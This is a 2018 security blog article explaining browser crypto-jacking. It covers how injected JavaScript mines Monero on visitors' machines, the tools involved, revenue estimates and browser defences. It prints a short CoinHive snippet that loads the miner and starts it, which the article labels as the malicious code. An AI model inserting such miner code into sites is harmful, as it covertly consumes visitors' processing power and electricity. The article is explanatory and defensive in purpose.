
New Era of Crypto-jacking

March 6, 2018 by Pedro Tavares

Introduction

Recently, cryptocurrencies have been making the headlines, not least because of the number of attacks surrounding them. One such attack is known as "crypto-jacking" or malicious "cryptomining."

Cryptocurrency began in 2008: Satoshi Nakamoto registered the domain name bitcoin.org on August 18th, 2008. A new paradigm was born, allowing money to be transferred over the Internet in a way never seen before. As a result, it was only a matter of time before attackers started exploring the complexity of this distributed technology.


Crypto-jacking allows the attacker to use a victim's web browser to mine cryptocurrency such as Bitcoin. The victim's resources, such as CPU power and electricity, are consumed to mine the cryptocurrency covertly.

How crypto-jacking works

Attackers use techniques such as code injection, Cross-Site Scripting (XSS), and SQL Injection (SQLi) to add a malicious snippet of code to a target system.

In web-browser crypto-jacking schemes, the attacker uses JavaScript on a web page to mine the cryptocurrency. JavaScript is used by almost all websites and is executed on the client side, in the user's web browser, so the mining runs on the visitor's machine.

The illustration below shows how this type of scheme is deployed:

Initially, the attacker adds malicious code to the target platform (such as a website, marked as 1 in the figure). The user accesses the website via their web browser, and the server renders the web content. The malicious code is delivered together with the legitimate website code, and the mining process commences in the browser.

There are different tools with which mining code can be embedded in a website. The best known is CoinHive, which is JavaScript-based; others include Crypto-Loot, JSEcoin, Coin Have, and PPoi. These APIs offer a miner for cryptocurrencies such as Monero, which has gained popularity over the last few months.

Next, a piece of code that can be used to mine a cryptocurrency is illustrated below:

    <!-- load the CoinHive miner library from the CoinHive CDN -->
    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>

    <script>
      // instantiate an anonymous miner bound to the site owner's token
      var miner = new CoinHive.Anonymous('YOUR_TOKEN');
      // start mining in the visitor's browser
      miner.start();
    </script>

The malicious snippet is described as follows:

  1. The CoinHive JavaScript library is loaded.
  2. The CoinHive API is set up with the site's Monero token.
  3. The miner then starts.

Advertisements and the crypto-jacking scheme

Cryptominers can be used legally when the website owner asks visitors for permission to use their processing power for mining. The practice becomes abusive when the attacker uses other users' machines without permission; this is crypto-jacking. The attacker slows down the target computer by consuming its memory and processing power while, at the same time, increasing the unsuspecting user's electricity bill.

How much money can hackers make through such schemes?

This question does not have an absolute answer; it depends on how much traffic the website receives. In a crypto-mining experiment conducted by Maxence Cornet, a website with approximately 1,000 visits per day and an average session duration of 55 seconds yielded a negative rate of return.

It mined 0.00947 XMR in 60 hours, a total of $0.89, or $0.36 per day. By comparison, a website with the same number of daily visits that uses conventional advertising could potentially achieve a better rate of return than the mining approach.

It is important to note that crypto-jacking is rising at a rapid pace. As a result, the Google and Opera web browsers have solutions in place that currently block in-browser crypto-jacking.

For example, Opera developed a browser feature to stop malicious mining, and Google Chrome also offers an extension called "No Coin Available" that blocks abusive mining.

Conclusion

As with other security matters, it is crucial to update systems and networks so that they are not maliciously exploited.

Hardware and electricity are two of the most significant expenses for cryptocurrency miners. Through crypto-jacking, the attacker bypasses these expenses and covertly makes the victims pay for them without their knowledge. Crypto-jackers can use 100% of the CPU power of the target machine, which overloads the CPU and can bring the whole system to a halt.

Finally, if you suspect that a website you visit may be compromised, you can check it by entering the website's URL on the "Who is mining" website, which maintains an up-to-date list of websites currently being used to mine cryptocurrency.

References

[1] https://www.cyberscoop.com/cryptojacking-malware-ransomware-zcash-monero-bitdefender

[2] https://nakedsecurity.sophos.com/2018/02/14/watch-our-ads-or-well-use-your-cpu-for-cryptomining/

[3] https://medium.com/@MaxenceCornet/coinhive-review-embeddable-javascript-crypto-miner-806f7024cde8

[4] https://seguranca-informatica.pt/crypto-jacking-again-identified-in-monero-cryptocurrency/

Pedro Tavares

Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst and Security Evangelist. He is also Editor-in-Chief of the computer security blog seguranca-informatica.pt.

In recent years, he has invested in the field of information security, exploring and analyzing a wide range of topics such as malware, reverse engineering, pentesting (Kali Linux), hacking/red teaming, mobile, cryptography, IoT, and computer network security. He is also a freelance writer.